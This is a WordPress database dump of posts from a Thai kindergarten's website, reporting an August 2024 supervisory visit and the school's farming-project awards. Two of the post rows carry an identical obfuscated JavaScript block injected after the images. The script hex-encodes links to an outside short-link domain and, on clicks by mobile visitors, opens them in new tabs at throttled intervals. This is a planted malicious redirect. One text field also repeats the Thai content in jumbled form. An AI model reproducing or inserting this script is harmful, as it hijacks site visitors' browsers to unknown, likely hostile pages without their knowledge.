(371,2,'2024-09-12 13:35:29','2024-09-12 06:35:29','<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t75/2/16/2728.png\">เมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโตได้น้อมนำปรัชญาของเศรษฐกิจพอเพียงมาบูรณาการจัดการเรียนรู้ เพื่อพัฒนาคุณภาพผู้เรียน ตามรอยพระบาทศาสตร์พระราชา <a></a>โคกหนองนาโมเดล และได้เข้าร่วมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน สืบสานพระราชเสาวนีย์ของสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567 ตามลำดับ <img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t5d/2/16/1f3c6.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8/2/16/1f331.png\"> “โคกหนองนา โรงเรียนอนุบาลวัดพระโต” เป็นแหล่งเรียนรู้ให้กับครู นักเรียน และผู้ที่สนใจเดินทางมาศึกษาดูงานมากมาย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"37373c23\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:35:29','2024-09-12 06:35:29','',367,'http://watprato.ssk.in.th/?p=371',0,'revision','',0),
(373,2,'2024-09-12 13:37:31','2024-09-12 06:37:31','','458199408_122175360092202781_7097423784924703217_n','','inherit','open','closed','','458199408_122175360092202781_7097423784924703217_n','','','2024-09-12 13:37:31','2024-09-12 06:37:31','',367,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n.jpg',0,'attachment','image/jpeg',0),
(374,2,'2024-09-12 13:38:47','2024-09-12 06:38:47','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต รงเรียนอนุบาลวัดพระโตได้น้อมนำปรัชญาของเศรษฐกิจพอเพียงมาบูรณาการจัดการเรียนรู้ เพื่อพัฒนาคุณภาพผู้เรียน ตามรอยพระบาทศาสตร์พระราชา โคกหนองนาโมเดล และได้เข้าร่วมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน สืบสานพระราชเสาวนีย์ของสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567 ตามลำดับโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู 